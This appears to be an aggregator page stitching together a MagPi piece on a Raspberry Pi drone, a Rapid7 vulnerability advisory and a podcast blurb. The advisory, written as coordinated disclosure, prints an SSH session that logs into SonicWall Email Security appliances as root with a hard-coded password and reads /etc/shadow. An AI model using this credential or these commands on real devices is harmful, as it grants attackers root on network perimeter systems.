NASA posted the Ingenuity helicopter’s open-source autonomous space-flight software, written specifically for use with Raspberry Pi, on GitHub. Avra took all this as a sign she “just had to experiment with the same technology they sent to Mars.”

F Prime and shine

Her plan was to see whether she could get GPS and lidar working within NASA’s framework, “and then take the sensors up on a drone and see how it all performed in the air.” Helpfully, NASA’s GitHub post included a detailed F Prime tutorial based around Raspberry Pi. Avra says understanding and using F Prime (F´) was the hardest part of her Epigone drone project. “It’s a beast to take on from an electronics enthusiast standpoint,” she says. Even so, she emphatically encourages others to explore and the opportunity  to make use of NASA’s code.

epigone drone front view
NASA recognises that Raspberry Pi offers a way to “dip your toe in embedded systems,” says Avra, and “encourages the idea that Linux can run on two planets in the solar system”

Raspberry Pi 4 brain

The Epigone Drone is built around Raspberry Pi 4 Model B; Garmin’s LIDAR-Lite v4, which connects to a Qwiic breakout board and has a laser rather than an LED; a battery pack; and a DJI Mini 2 drone borrowed from a videographer colleague. Having seen how small the drone was, Avra realised 3D-printing an enclosure case would make everything far too heavy. As it was, positioning the Epigone onto its host drone was challenging enough: the drone’s rotors passed worryingly close to the project’s Raspberry Pi, even when precisely positioned in the centre of the drone’s back. The drone has its own sensors to allow for controlled navigation, which meant Avra’s design had to diverge from NASA’s and have its lidar ‘eyes’ on its side rather than underneath.

Although her version piggybacks on an existing drone, Avra was amazed when her Epigone creation took flight:

“I honestly thought [it] would be too heavy to achieve lift, but what do ya know, it flew! It went up maybe 30 ft and we were able to check the sensors by moving it close and far from the SparkFun HQ [where she works].”

While the drone’s battery depleted in “a matter of minutes” due to its additional load, the Epigone worked well and could be deployed to map small areas of land such as elevation changes in a garden, Avra suggests.

The MagPi #107 out NOW!

MagPi 107 cover

You can grab the brand-new issue right now from the Raspberry Pi Press store, or via our app on Android or iOS. You can also pick it up from supermarkets and newsagents. There’s also a free PDF you can download.

The post ‘Epigone drone’ pays homage to NASA’s Mars Helicopter | The MagPi #107 appeared first on Raspberry Pi.

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/06/23/cve-2021-20025-sonicwall-email-security-appliance-backdoor-credential/

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

The virtual, on-premises version of the SonicWall Email Security Appliance ships with an undocumented, static credential, which can be used by an attacker to gain root privileges on the device. This is an instance of CWE-798: Use of Hard-coded Credentials, and has an estimated CVSSv3 score of 9.1. This issue was fixed by the vendor in version 10.0.10, according to the vendor’s advisory, SNWLID-2021-0012.

Product Description

The SonicWall Email Security Virtual Appliance is a solution which “defends against advanced email-borne threats such as ransomware, zero-day threats, spear phishing and business email compromise (BEC).” It is in use in many industries around the world as a primary means of preventing several varieties of email attacks. More about SonicWall’s solutions can be found at the vendor’s website.

Credit

This issue was discovered by William Vu of Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The session capture detailed below illustrates using the built-in SSH management interface to connect to the device as the root user with the password, “sonicall”.

This attack was tested on 10.0.9.6105 and 10.0.9.6177, the latest builds available at the time of testing.

wvu@kharak:~$ ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null [email protected]
Warning: Permanently added '192.168.123.251' (ECDSA) to the list of known hosts.
For CLI access you must login as snwlcli user.
[email protected]'s password: sonicall
[root@snwl ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[root@snwl ~]# uname -a
Linux snwl.example.com 4.19.58-snwl-VMWare64 #1 SMP Wed Apr 14 20:59:36 PDT 2021 x86_64 GNU/Linux
[root@snwl ~]# grep root /etc/shadow
root:Y0OoRLtjUwq1E:12605:0:::::
[root@snwl ~]# snwlcli
Login: admin
Password:
SNWLCLI> version
10.0.9.6177
SNWLCLI>

Impact

Given remote root access to what is usually a perimeter-homed device, an attacker can further extend their reach into a targeted network to launch additional attacks against internal infrastructure from across the internet. More locally, an attacker could likely use this access to update or disable email scanning rules and logic to allow for malicious email to pass undetected to further exploit internal hosts.

Remediation

As detailed in the vendor’s advisory, users are urged to use at least version 10.0.10 on fresh installs of the affected virtual host. Note that updating to version 10.0.10 or later does not appear to resolve the issue directly; users who update existing versions should ensure they are also connected to the MySonicWall Licensing services in order to completely resolve the issue.

For sites that are not able to update or replace affected devices immediately, access to remote management services should be limited to only trusted, internal networks — most notably, not the internet.

Disclosure Timeline

Rapid7’s coordinated vulnerability disclosure team is deeply impressed with this vendor’s rapid turnaround time from report to fix. This vulnerability was both reported and confirmed on the same day, and thanks to SonicWall’s excellent PSIRT team, a fix was developed, tested, and released almost exactly three weeks after the initial report.

  • April, 2021: Issue discovered by William Vu of Rapid7
  • Thu, Apr 22, 2021: Details provided to SonicWall via their CVD portal
  • Thu, Apr 22, 2021: Confirmed reproduction of the issue by the vendor
  • Thu, May 13, 2021: Update released by the vendor, removing the static account
  • Thu, May 13, 2021: CVE-2021-20025 published in SNWLID-2021-0012
  • Wed, Jun 23, 2021: Rapid7 advisory published with further details

Don Spies and Kim Grauer on tracking illicit Bitcoin transactions

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/06/23/don-spies-and-kim-grauer-on-tracking-illicit-bitcoin-transactions/

Don Spies and Kim Grauer on tracking illicit Bitcoin transactions

In this episode of Security Nation, we’re joined by Don Spies and Kim Grauer of Chainalysis. They discuss the relationship between ransomware and cryptocurrency and how Chainalysis leverages unique characteristics of the latter to combat the former.

Stick around for our Rapid Rundown, where Tod and Jen discuss a newly discovered, very old crypto vulnerability (and by crypto we mean encryption!), as well as take a look at election security news here in the wake of literally hundreds of audits of polling results.

Kim Grauer

Don Spies and Kim Grauer on tracking illicit Bitcoin transactions

Kim Grauer is the Director of Research at Chainalysis, where she examines trends in cryptocurrency economics and crime. She was trained in economics at the London School of Economics and in politics at Oxford University. Previously, she explored technological advancements in developing countries as an academic research associate at the London School of Economics and was an economics researcher at the New York City Economic Development Corporation.

Don Spies

Don Spies and Kim Grauer on tracking illicit Bitcoin transactions

Don Spies is the Director of Strategic Initiatives for Chainalysis, where he works with federal agencies to address their cryptocurrency needs. This includes fighting terrorism, enforcing sanctions, and detecting money laundering. Previously, Don held various roles at the U.S. Department of the Treasury. He also spent 13 years as an Intelligence Officer in the U.S. Army Reserve.

Want More Inspiring Stories From the Security Community?

Subscribe to Security Nation Today

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close